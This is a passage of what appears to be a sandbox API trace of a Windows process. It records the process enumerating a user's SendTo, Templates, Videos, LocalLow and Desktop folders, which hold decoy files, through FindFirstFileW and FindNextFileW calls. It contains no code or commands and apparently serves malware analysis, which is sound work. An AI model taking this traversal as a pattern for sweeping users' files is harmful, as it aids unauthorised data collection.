hHeap=0x660000) returned 1 [0056.411] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.411] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0056.411] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.411] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.411] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.411] PathFindFileNameW (pszPath="") returned="" [0056.411] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.411] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.411] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0056.411] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.411] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.411] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.411] PathFindFileNameW (pszPath="") returned="" [0056.411] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.412] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0056.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.412] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.412] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.412] PathFindFileNameW (pszPath="") returned="" [0056.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0056.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.412] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0056.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.412] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.412] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.412] PathFindFileNameW (pszPath="") returned="" [0056.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x73aa6f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x73aa6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x73aa6f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x73aa6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c23fe0, ftCreationTime.dwHighDateTime=0x1d4d0c9, ftLastAccessTime.dwLowDateTime=0x6231a9f0, ftLastAccessTime.dwHighDateTime=0x1d4cc57, ftLastWriteTime.dwLowDateTime=0x6231a9f0, ftLastWriteTime.dwHighDateTime=0x1d4cc57, nFileSizeHigh=0x0, nFileSizeLow=0x15b36, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-UhIDPZCm6I2UoJXWw.mkv", cAlternateFileName="-UHIDP~1.MKV")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x27e7be0, ftLastAccessTime.dwHighDateTime=0x1d4cbe5, ftLastWriteTime.dwLowDateTime=0x27e7be0, ftLastWriteTime.dwHighDateTime=0x1d4cbe5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="27nF", cAlternateFileName="")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe043560, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x8b63bb70, ftLastAccessTime.dwHighDateTime=0x1d4ccab, ftLastWriteTime.dwLowDateTime=0x8b63bb70, ftLastWriteTime.dwHighDateTime=0x1d4ccab, nFileSizeHigh=0x0, nFileSizeLow=0x43d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8MMWzVzn.mp4", cAlternateFileName="")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b58340, ftCreationTime.dwHighDateTime=0x1d4ca45, ftLastAccessTime.dwLowDateTime=0xd9aec6a0, ftLastAccessTime.dwHighDateTime=0x1d4c5a6, ftLastWriteTime.dwLowDateTime=0xd9aec6a0, ftLastWriteTime.dwHighDateTime=0x1d4c5a6, nFileSizeHigh=0x0, nFileSizeLow=0xa1e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9P25HE-ZzsQt.mkv", cAlternateFileName="9P25HE~1.MKV")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4372100, ftCreationTime.dwHighDateTime=0x1d4d4e8, ftLastAccessTime.dwLowDateTime=0xe5687140, ftLastAccessTime.dwHighDateTime=0x1d4ce5b, ftLastWriteTime.dwLowDateTime=0xe5687140, ftLastWriteTime.dwHighDateTime=0x1d4ce5b, nFileSizeHigh=0x0, nFileSizeLow=0xce11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GIpLP30n0FbK.mkv", cAlternateFileName="GIPLP3~1.MKV")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x5c61f380, ftLastAccessTime.dwHighDateTime=0x1d4cce4, ftLastWriteTime.dwLowDateTime=0x5c61f380, ftLastWriteTime.dwHighDateTime=0x1d4cce4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jYsvlZ", cAlternateFileName="")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df21e80, ftCreationTime.dwHighDateTime=0x1d4cb11, ftLastAccessTime.dwLowDateTime=0x81f3b8c0, ftLastAccessTime.dwHighDateTime=0x1d4ca43, ftLastWriteTime.dwLowDateTime=0x81f3b8c0, ftLastWriteTime.dwHighDateTime=0x1d4ca43, nFileSizeHigh=0x0, nFileSizeLow=0x8d57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="otAFCyQ0nHxWrUo d.mkv", cAlternateFileName="OTAFCY~1.MKV")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0xe3df79c0, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0xb018, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf", cAlternateFileName="")) returned 1 [0056.413] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e19520, ftCreationTime.dwHighDateTime=0x1d4d434, ftLastAccessTime.dwLowDateTime=0xe3df79c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0xe3df79c0, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0xb018, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XBdxFZI.swf", cAlternateFileName="")) returned 0 [0056.413] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b520 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32618f0 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b0a8 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b728 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b790 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b7f8 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a080 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b860 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a0d8 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a130 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0056.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a188 | out: hHeap=0x660000) returned 1 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a1e0 | out: hHeap=0x660000) returned 1 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329a238 | out: hHeap=0x660000) returned 1 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b5f0 | out: hHeap=0x660000) returned 1 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260fa8 | out: hHeap=0x660000) returned 1 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0056.414] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.414] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0056.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0056.414] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.414] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.414] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.414] PathFindFileNameW (pszPath="") returned="" [0056.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0056.414] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.414] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0056.414] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0056.414] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0056.415] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b5f0 | out: hHeap=0x660000) returned 1 [0056.415] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.415] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\") returned="NxkfKpMd\\" [0056.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0056.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.415] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.415] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.415] PathFindFileNameW (pszPath="") returned="" [0056.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x2c5f7080, ftLastAccessTime.dwHighDateTime=0x1d4cac4, ftLastWriteTime.dwLowDateTime=0x2c5f7080, ftLastWriteTime.dwHighDateTime=0x1d4cac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46ed7210, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0x2c5f7080, ftLastAccessTime.dwHighDateTime=0x1d4cac4, ftLastWriteTime.dwLowDateTime=0x2c5f7080, ftLastWriteTime.dwHighDateTime=0x1d4cac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ff14610, ftCreationTime.dwHighDateTime=0x1d4d2b5, ftLastAccessTime.dwLowDateTime=0xc3d2ea00, ftLastAccessTime.dwHighDateTime=0x1d4ca24, ftLastWriteTime.dwLowDateTime=0xc3d2ea00, ftLastWriteTime.dwHighDateTime=0x1d4ca24, nFileSizeHigh=0x0, nFileSizeLow=0x888b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Ymy8S 8yhOe9ZasNJRs.flv", cAlternateFileName="-YMY8S~1.FLV")) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c9db60, ftCreationTime.dwHighDateTime=0x1d4d0df, ftLastAccessTime.dwLowDateTime=0x734ef9c0, ftLastAccessTime.dwHighDateTime=0x1d4c63c, ftLastWriteTime.dwLowDateTime=0x734ef9c0, ftLastWriteTime.dwHighDateTime=0x1d4c63c, nFileSizeHigh=0x0, nFileSizeLow=0x7b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2qd8JzHjkGInT4Dq.png", cAlternateFileName="2QD8JZ~1.PNG")) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf6856c0, ftCreationTime.dwHighDateTime=0x1d4ca8e, ftLastAccessTime.dwLowDateTime=0x72fe4fd0, ftLastAccessTime.dwHighDateTime=0x1d4c68b, ftLastWriteTime.dwLowDateTime=0x72fe4fd0, ftLastWriteTime.dwHighDateTime=0x1d4c68b, nFileSizeHigh=0x0, nFileSizeLow=0x8c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F0_0MMpq eXwaNPyOb.png", cAlternateFileName="F0_0MM~1.PNG")) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb2d100, ftCreationTime.dwHighDateTime=0x1d4ccfd, ftLastAccessTime.dwLowDateTime=0x13c954a0, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0x13c954a0, ftLastWriteTime.dwHighDateTime=0x1d4c628, nFileSizeHigh=0x0, nFileSizeLow=0x11770, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gg9DmOuSzgeAHjPyg_oR.mp3", cAlternateFileName="GG9DMO~1.MP3")) returned 1 [0056.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 1 [0056.416] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, 